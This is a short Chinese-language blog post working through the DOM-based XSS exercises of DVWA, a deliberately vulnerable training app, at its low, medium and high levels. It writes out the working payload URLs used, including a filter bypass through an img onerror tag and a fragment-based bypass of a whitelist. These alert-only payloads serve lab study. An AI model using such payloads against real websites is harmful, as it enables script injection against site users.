dvwa-DOM型xss
1、低级别
查看代码,服务端未做任何处理。因此,地址栏访问:
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=Englishabc%3Cscript%3Ealert(/xss/)%3C/script%3E
2、中级别
检查前端代码未变化,而后端提示代码对default参数进行了检查,不能包含<script。
基于stripos函数,不区分大小写。
解决:利用其他标签进行。注意需要关闭option、select标签
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English%3C/option%3E%3C/select%3E%3Cimg%20src=1%20onerror=alert(/xss/)%3E
3、高级别
查看服务端提示代码,其做了白名单限制。default参数不符合,则直接设置下拉菜单的回显内容。
解决:地址栏#之后的内容不发送,而前端js是通过截取地址栏字符串的形式取出default参数值,而非直接param属性。因此,document.write可以对#之后的内容进行读取,并设为脚本。
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English#%3Cscript%3Ealert(123)%3C/script%3E
4、不可能
查看服务端提示代码,没有做任何处理。
结果是<>”等敏感字符被做了url编码输出。貌似是浏览器自身的xss防护功能开启。但暂时未找到关键的前端代码。
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战